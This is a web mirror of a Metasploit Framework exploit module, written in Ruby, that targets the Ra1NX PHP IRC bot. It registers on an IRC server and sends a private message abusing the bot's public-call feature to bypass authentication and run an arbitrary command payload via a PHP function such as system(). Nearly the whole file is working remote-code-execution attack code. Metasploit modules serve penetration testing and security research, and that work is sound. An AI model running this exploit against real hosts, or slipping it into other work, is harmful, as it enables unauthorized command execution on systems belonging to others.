CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',

14
      'Description'    => %q{

15
            This module allows remote command execution on the PHP IRC bot Ra1NX by

16
          using the public call feature in private message to covertly bypass the

17
          authentication system.

18
        },

19
      'Author'         =>

20
        [

21
          'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module

22
        ],

23
      'License'        => MSF_LICENSE,

24
      'References'     =>

25
        [

26
          ['OSVDB', '91663'],

27
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],

28
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],

29
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']

30
        ],

31
      'Platform'       => %w{ unix win },

32
      'Arch'           => ARCH_CMD,

33
      'Payload'        =>

34
        {

35
          'Space'    => 344,

36
          'BadChars' => '',

37
          'DisableNops' => true,

38
          'Compat'      =>

39
            {

40
              'PayloadType' => 'cmd'

41
            }

42
        },

43
      'Targets'  =>

44
        [

45
          ['Ra1NX / Unix', { 'Platform' => 'unix' } ],

46
          ['Ra1NX / Windows', { 'Platform' => 'win' } ]

47
        ],

48
      'Privileged'     => false,

49
      'DisclosureDate' => '2013-03-24',

50
      'DefaultTarget'  => 0))

51


52
    register_options(

53
      [

54
        Opt::RPORT(6667),

55
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

56
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

57
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),

58
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])

59
      ])

60
  end

61


62
  def post_auth?

63
    true

64
  end

65


66
  def connect_irc

67
    print_status("#{rhost}:#{rport} - Connecting to IRC server...")

68
    connect

69


70
    data = ""

71
    begin

72
      read_data = sock.get_once(-1, 1)

73
      while not read_data.nil?

74
        data << read_data

75
        read_data = sock.get_once(-1, 1)

76
      end

77
    rescue EOFError

78
    end

79


80
    if data and data =~ /020.*wait/

81
      print_good("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")

82
      select(nil, nil, nil, 3)

83
    end

84
  end

85


86
  def check

87
    connect_irc

88


89
    response = register(sock)

90
    if response =~ /463/ or response =~ /464/

91
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

92
      return Exploit::CheckCode::Unknown

93
    end

94


95
    confirm_string = rand_text_alpha(8)

96
    response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")

97


98
    quit(sock)

99
    disconnect

100


101
    if response =~ /#{confirm_string}/

102
      return Exploit::CheckCode::Vulnerable

103
    else

104
      return Exploit::CheckCode::Safe

105
    end

106
  end

107


108
  def send_msg(sock, data)

109
    sock.put(data)

110
    data = ""

111
    begin

112
      read_data = sock.get_once(-1, 1)

113
      while not read_data.nil?

114
        data << read_data

115
        read_data = sock.get_once(-1, 1)

116
      end

117
    rescue EOFError

118
    end

119
    data

120
  end

121


122
  def register(sock)

123
    msg = ""

124


125
    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?

126
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

127
    end

128


129
    if datastore['NICK'].length > 9

130
      nick = rand_text_alpha(9)

131
      print_error("The nick is longer than 9 characters, using #{nick}")

132
    else

133
      nick = datastore['NICK']

134
    end

135


136
    msg << "NICK #{nick}\r\n"

137
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

138


139
    response = send_msg(sock,msg)

140
    return response

141
  end

142


143
  def ra1nx_command(sock)

144
    encoded = payload.encoded

145
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"

146
    response = send_msg(sock, command_msg)

147
    return response

148
  end

149


150
  def quit(sock)

151
    quit_msg = "QUIT :bye bye\r\n"

152
    sock.put(quit_msg)

153
  end

154


155
  def exploit

156
    connect_irc

157


158
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

159
    response = register(sock)

160
    if response =~ /463/ or response =~ /464/

161
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

162
      return

163
    end

164


165
    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")

166
    ra1nx_command(sock)

167


168
    quit(sock)

169
    disconnect

170
  end

171
end

172


173